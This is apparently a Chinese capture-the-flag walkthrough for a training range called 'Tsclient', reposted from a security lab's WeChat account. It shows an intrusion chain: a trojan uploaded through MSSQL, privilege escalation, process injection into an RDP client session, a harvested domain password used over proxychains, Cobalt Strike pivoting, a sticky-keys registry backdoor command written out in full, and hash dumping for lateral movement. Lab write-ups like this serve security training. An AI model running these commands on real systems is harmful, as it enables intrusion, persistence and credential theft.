传个木马上去
先whomai一下
看到用户名是mssqlserver,我们最好把文件传到对应用户目录下,不然很可能没权限
打靶我们就直接传desktop
执行一下直接就回来了,这里mdut提权不是很好用,换sharpsqltool
完成,RDP一把梭
发现网络上挂载着一个tsclinet
我们查询下会话
netstat看到是从31连回来的
我们可以在进程里看到john的进程
直接注入
可以看到得到两个john的权限,我们这时候就可以直接访问共享目录的信息
拿到新的账号密码,我们立刻做个代理,准备连上去proxychains4 rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p 'Ald@rLMWuy7Z!#'
提示更改密码,密码改成了!QAZ2wsx然后直接再换回windows连接(linux太卡了,但是windows没得改密码,Linux可以)然后CS设置转发上线,把中转beacon传上去
想办法提权Get-Acl -Path "HKLM:SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options" | fl *
我们可以通过粘滞键进行提权reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:WindowsSystem32cmd.exe"我们执行完以后锁屏,按shift激活粘滞键
成功,这里最好拿到权限第一时间注入到别的进程里,不然很容易漏掉找到flag2
抓取hash直接横
根据前两次经验,直接定位flagC:UsersAdministratorflagflag03.txt
至此完成,我们再重整一下思路
原文始发于微信公众号(赛搏思安全实验室):春秋云镜-Tsclient WP
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论